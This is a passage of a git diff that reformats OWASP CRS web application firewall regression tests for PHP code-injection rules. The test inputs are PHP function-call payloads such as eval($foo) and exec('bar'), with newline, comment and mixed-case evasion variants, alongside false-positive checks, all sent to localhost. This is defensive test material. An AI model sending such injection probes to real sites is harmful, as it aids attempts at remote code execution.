text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "933150" + - test_id: 16 desc: get_defined_vars stages: - - stage: - input: - data: foo=get_defined_vars%28%29%5B0%5D - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-17 + - input: + data: foo=get_defined_vars%28%29%5B0%5D + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "933150" + - test_id: 17 desc: | PHP function call in body, mixed case. payload: curl_iNit() stages: - - stage: - input: - data: foo=curl_iNit%28%29 - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-18 + - input: + data: foo=curl_iNit%28%29 + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "933150" + - test_id: 18 desc: | PHP function call in body payload: posix_getegid() stages: - - stage: - input: - data: posix_getegid%28%29 - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-19 + - input: + data: posix_getegid%28%29 + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "933150" + - test_id: 19 desc: | PHP function call in body, mixed case payload: Print_r() stages: - - stage: - input: - data: x=Print_r%28%20%29 - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/print_r" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-20 + - input: + data: x=Print_r%28%20%29 + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/print_r" + version: "HTTP/1.1" + output: + log_contains: id "933150" + - test_id: 20 desc: | PHP function call in body. payload: strrev() stages: - - stage: - input: - data: x=strrev%28%20%29 - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/strrev" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-21 + - input: + data: x=strrev%28%20%29 + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/strrev" + version: "HTTP/1.1" + output: + log_contains: id "933150" + - test_id: 21 desc: | False Positive test payload: the files (yep) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=the%20files%20%28yep%29" - version: "HTTP/1.1" - output: - no_log_contains: id "933150" - - test_title: 933150-22 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=the%20files%20%28yep%29" + version: "HTTP/1.1" + output: + no_log_contains: id "933150" + - test_id: 22 desc: | False Positive test, exec should be followed by parenthesis payload: exec ( stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=exec%20%28" - version: "HTTP/1.1" - output: - no_log_contains: id "933150" - - test_title: 933150-23 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=exec%20%28" + version: "HTTP/1.1" + output: + no_log_contains: id "933150" + - test_id: 23 desc: | False Positive test payload: executor() stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=executor%28%29" - version: "HTTP/1.1" - output: - no_log_contains: id "933150" - - test_title: 933150-24 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=executor%28%29" + version: "HTTP/1.1" + output: + no_log_contains: id "933150" + - test_id: 24 desc: | False Positive test payload: cheval($foo) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=cheval%28%24foo%29" - version: "HTTP/1.1" - output: - no_log_contains: id "933150" - - test_title: 933150-25 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=cheval%28%24foo%29" + version: "HTTP/1.1" + output: + no_log_contains: id "933150" + - test_id: 25 desc: | False Positive test payload: audiofile($foo) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=audi%6ffile%28%24foo%29" - version: "HTTP/1.1" - output: - no_log_contains: id "933150" - - test_title: 933150-26 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=audi%6ffile%28%24foo%29" + version: "HTTP/1.1" + output: + no_log_contains: id "933150" + - test_id: 26 desc: | False Positive test payload: the system is down() stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=the%20system%20is%20down%28%29" - version: "HTTP/1.1" - output: - no_log_contains: id "933150" - - test_title: 933150-27 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=the%20system%20is%20down%28%29" + version: "HTTP/1.1" + output: + no_log_contains: id "933150" + - test_id: 27 desc: | False Positive test payload: ecosystem() stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=ecosystem%28%29" - version: "HTTP/1.1" - output: - no_log_contains: id "933150" - - test_title: 933150-28 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=ecosystem%28%29" + version: "HTTP/1.1" + output: + no_log_contains: id "933150" + - test_id: 28 desc: | False Positive test, function doesn't exist payload: systems() stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=systems%28%29" - version: "HTTP/1.1" - output: - no_log_contains: id "933150" - - test_title: 933150-29 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=systems%28%29" + version: "HTTP/1.1" + output: + no_log_contains: id "933150" + - test_id: 29 desc: | False Positive test, function doesn't exist payload: system something() stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=system%20something%28%29" - version: "HTTP/1.1" - output: - no_log_contains: id "933150" - - - test_title: 933150-30 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=system%20something%28%29" + version: "HTTP/1.1" + output: + no_log_contains: id "933150" + - test_id: 30 desc: "Snippets of English words (like `prev`) should not be matched, requiring regex match with word boundaries (e.g. 933160)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post?a=preview" - version: "HTTP/1.1" - output: - no_log_contains: id "933150" - - test_title: 933150-31 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post?a=preview" + version: "HTTP/1.1" + output: + no_log_contains: id "933150" + - test_id: 31 desc: "Snippets of English words (like `exp`) should not be matched, requiring regex match with word boundaries (e.g. 933160)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post?a=exploration" - version: "HTTP/1.1" - output: - no_log_contains: id "933150" - - test_title: 933150-32 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post?a=exploration" + version: "HTTP/1.1" + output: + no_log_contains: id "933150" + - test_id: 32 desc: | PHP mixed case function call with space, LF between (). payload: file_ExistS (\n\n) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=file_ExistS%20%28%0A%0A%29" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-33 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=file_ExistS%20%28%0A%0A%29" + version: "HTTP/1.1" + output: + log_contains: id "933150" + - test_id: 33 desc: | PHP function call with multiple whitespaces. payload: fopen (blah) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=fopen%20%20%28blah%29" - version: "HTTP/1.1" - output: - log_contains: id "933150" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=fopen%20%20%28blah%29" + version: "HTTP/1.1" + output: + log_contains: id "933150" diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933151.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933151.yaml index a7e7303d5..0d582b7e3 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933151.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933151.yaml @@ -2,135 +2,125 @@ meta: author: "lifeforms, ssigwart, azurit" description: None - enabled: true - name: 933151.yaml tests: - - test_title: 933151-1 + - test_id: 1 desc: "pmf + chain" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/array_diff%20%28" - version: "HTTP/1.1" - output: - log_contains: id "933151" - - test_title: 933151-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/array_diff%20%28" + version: "HTTP/1.1" + output: + log_contains: id "933151" + - test_id: 2 desc: "pmf + chain" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?date_ADD%28%29" - version: "HTTP/1.1" - output: - log_contains: id "933151" - - test_title: 933151-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?date_ADD%28%29" + version: "HTTP/1.1" + output: + log_contains: id "933151" + - test_id: 3 desc: "non-dangerous PHP functions, removed to reduce FP" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=filemtime%28%24foo%29" - version: "HTTP/1.1" - output: - no_log_contains: id "933151" - - test_title: 933151-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=filemtime%28%24foo%29" + version: "HTTP/1.1" + output: + no_log_contains: id "933151" + - test_id: 4 desc: "pmf + chain" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "gethostbynamE(" - version: "HTTP/1.1" - output: - log_contains: id "933151" - - test_title: 933151-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "gethostbynamE(" + version: "HTTP/1.1" + output: + log_contains: id "933151" + - test_id: 5 desc: "No parenthesis after keyword" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=array_diff" - version: "HTTP/1.1" - output: - no_log_contains: id "933151" - - test_title: 933151-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=array_diff" + version: "HTTP/1.1" + output: + no_log_contains: id "933151" + - test_id: 6 desc: "rule should not trigger when there are other words before parenthesis" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?a=ceiling%20height(9ft)" - version: "HTTP/1.1" - output: - no_log_contains: id "933151" - - test_title: 933151-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?a=ceiling%20height(9ft)" + version: "HTTP/1.1" + output: + no_log_contains: id "933151" + - test_id: 7 desc: "snippets of Eng words (like prev) should not be matched, requiring regex match with word boundaries (e.g. 933160)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?a=preview" - version: "HTTP/1.1" - output: - no_log_contains: id "933151" - - test_title: 933151-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?a=preview" + version: "HTTP/1.1" + output: + no_log_contains: id "933151" + - test_id: 8 desc: "snippets of Eng words (like exp) should not be matched, requiring regex match with word boundaries (e.g. 933160)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?a=exploration" - version: "HTTP/1.1" - output: - no_log_contains: id "933151" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?a=exploration" + version: "HTTP/1.1" + output: + no_log_contains: id "933151" diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml index c3c835a35..986482f94 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml @@ -2,679 +2,640 @@ meta: author: "lifeforms, Franziska Bühler, Max Leske, azurit" description: None - enabled: true - name: 933160.yaml tests: - - test_title: 933160-1 + - test_id: 1 desc: | PHP function call in query. payload: chr(123) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=chr%28123%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=chr%28123%29" + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 2 desc: | PHP function call with variable as parameter. payload: eval($foo) stages: - - stage: - input: - data: eval($foo) - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-3 + - input: + data: eval($foo) + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 3 desc: | PHP function call, CR, ($variable). payload: eval\r($foo) stages: - - stage: - input: - data: eval%0D%28%24foo%29 - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-4 + - input: + data: eval%0D%28%24foo%29 + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 4 desc: | PHP function call, LF, ('value'). payload: exec\n('bar') stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=exec%0A%28%27bar%27%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=exec%0A%28%27bar%27%29" + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 5 desc: | PHP uppercase function call, CR, LF, (). payload: FILE\r\n() stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=FILE%0D%0A%28%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=FILE%0D%0A%28%29" + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 6 desc: | PHP function call with multiple whitespaces. payload: exec (blah) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=exec%20%20%28blah%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=exec%20%20%28blah%29" + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 7 desc: | PHP function call using Error Control Operator. payload: @exec('test') stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=%40exec%28%27test%27%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=%40exec%28%27test%27%29" + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 8 desc: | PHP function call with vertical tab. payload: exec (blah) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=exec%09%28blah%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=exec%09%28blah%29" + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 9 desc: | PHP function call with comment and newline. payload: exec //comment\r\n (blah) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=exec%20%2f%2fcomment%0d%0a%20%28blah%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=exec%20%2f%2fcomment%0d%0a%20%28blah%29" + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 10 desc: | PHP function call with comment and newline. payload: exec #comment\r\n (blah) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=exec%20%23comment%0d%0a%20%28blah%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=exec%20%23comment%0d%0a%20%28blah%29" + version: "HTTP/1.1" + output: + log_contains: id "933160" + - test_id: 11 desc: | PHP function call with comment and newline. payload: exec#\n () stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 